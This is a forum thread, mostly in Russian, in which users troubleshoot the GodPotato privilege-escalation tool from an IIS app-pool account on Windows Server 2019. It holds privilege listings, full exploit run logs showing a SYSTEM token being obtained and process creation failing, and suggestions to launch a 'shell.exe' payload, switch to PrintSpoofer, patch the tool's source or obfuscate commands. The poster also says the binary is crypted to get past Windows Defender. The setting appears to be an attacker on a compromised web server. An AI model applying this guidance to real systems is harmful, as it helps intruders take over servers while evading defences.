Windows Server 2019 & GodPotato

[scoring0]

PS C:\temp> whoami /priv
iis apppool\site.com

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

PS C:\temp> ./GodPotato.exe -cmd "cmd /c whoami"
2024/06/03 17:46:23 Done
2024/06/03 17:46:23 Done
[*] CombaseModule: 0x140731431387136
[*] DispatchTable: 0x140731433693296
[*] UseProtseqFunction: 0x140731433069472
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\GodPotato\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000e802-ffff-ffff-7765-7dd88b905429
[*] DCOM obj OXID: 0x5e913da944b80fff
[*] DCOM obj OID: 0x9834259193e6999e
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 1336 Token:0x828  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[!] Cannot create process Win32Error:5
the MethodInfo::Invoke_3 method returned an error:
Access is denied.

SeImpersonatePrivilege имеется.
АВ в системе нет, только Windefender, файл криптованный.
В чем может быть проблема?

 

[SunYatsen]

./godpotato.exe -cmd "cmd /c shell.exe

Вы пробовали это?

 

[scoring0]

./godpotato.exe -cmd "cmd /c shell.exe

Вы пробовали это?

Да, что только не пробовал. Везде один ответ:

[!] Cannot create process Win32Error:5
the MethodInfo::Invoke_3 method returned an error:
Access is denied.

 

[USA_Straday]

GitHub - itm4n/PrintSpoofer: Abusing impersonation privileges through the "Printer Bug"

Abusing impersonation privileges through the "Printer Bug" - itm4n/PrintSpoofer

github.com

 

[rwxrwx]

It seems that SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege are not enabled, which will make the priv esc fail with GodPotato.

 

[scoring0]

It seems that SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege are not enabled, which will make the priv esc fail with GodPotato.

GodPotato require only SeImpersonatePrivilege...

 

[furi]

там учетка созданная группой IIS?

у этой группы есть какие то ограничения начиная то файловой системы и отдельными политиками. сталкивался с подобным

 

[scoring0]

там учетка созданная группой IIS?

у этой группы есть какие то ограничения начиная то файловой системы и отдельными политиками. сталкивался с подобным

iis apppool\site.com

Да, она в IISUSERS.
Как выкручивался?

 

[prox]

аппну тему, та же беда, какие еще есть решения?

 

[xargs]

[*] CurrentUser: NT AUTHORITY\SYSTEM

[!] Cannot create process Win32Error:5

ну судя по всему он повышает права, а вот ошибка говорит:

Ошибка Win32Error: 5 в системах Windows означает "Отказано в доступе" (Access Denied). Эта ошибка возникает, когда программа или процесс пытается получить доступ к ресурсу (например, файл, папка, реестр), к которому у него нет необходимых прав.

Вот несколько шагов, которые могут помочь в решении этой проблемы:

1. Запуск от имени администратора:
   • Убедитесь, что вы запускаете программу с правами администратора. Это можно сделать, щелкнув правой кнопкой мыши на исполняемом файле и выбрав "Запуск от имени администратора".
2. Проверка прав доступа:
   • Проверьте права доступа к ресурсу, к которому программа пытается получить доступ. Убедитесь, что у пользователя, под которым запускается программа, есть необходимые права.
3. Антивирус/Защитник Windows:
   • Иногда антивирусное ПО или Защитник Windows могут блокировать доступ к некоторым ресурсам. Попробуйте временно отключить их и посмотреть, решит ли это проблему.
4. Проверка UAC (User Account Control):
   • Иногда UAC может блокировать доступ к определенным ресурсам. Попробуйте временно понизить уровень контроля учетных записей и проверить, исчезнет ли ошибка.
5. Изменение настроек реестра или политики безопасности:
   • В редких случаях может понадобиться изменение настроек реестра или политики безопасности Windows. Это может быть рискованно, поэтому рекомендуется сначала создать точку восстановления системы.

в коде https://github.com/BeichenDream/GodPotato/blob/main/SharpToken.cs строка 1400 мне сейчас лень весь код ковырять но мне кажется нужно изменить способ из создания процесса на создание потока (threads) и судя по всему ето АВ блочит, возможно подойдут обфусцированные команды или запуск блокнота как вариант для проверки.

 

[scoring0]

ну судя по всему он повышает права, а вот ошибка говорит:



в коде https://github.com/BeichenDream/GodPotato/blob/main/SharpToken.cs строка 1400 мне сейчас лень весь код ковырять но мне кажется нужно изменить способ из создания процесса на создание потока (threads) и судя по всему ето АВ блочит, возможно подойдут обфусцированные команды или запуск блокнота как вариант для проверки.

Блокнот не запускается с той-же ошибкой, АВ нет в системе, кроме виндефа.

 

[TheExample]

[*] CombaseModule: 0x140721165238272
[*] DispatchTable: 0x140721167540288
[*] UseProtseqFunction: 0x140721166917776
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\fd9685be-4d83-440a-8e4e-d1c8a61c751f\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-0000000000046
[*] DCOM obj IPID: 00008002-1450-ffff-c67a-4d19b1e3a9aa
[*] DCOM obj OXID: 0x2402133245c631c
[*] DCOM obj OID: 0x4be19bbc087f5ab3
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Identification
[*] Start Search System Token
[*] Find System Token : False
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[!] Cannot create process Win32Error:1314

why? [!] Cannot create process Win32Error:1314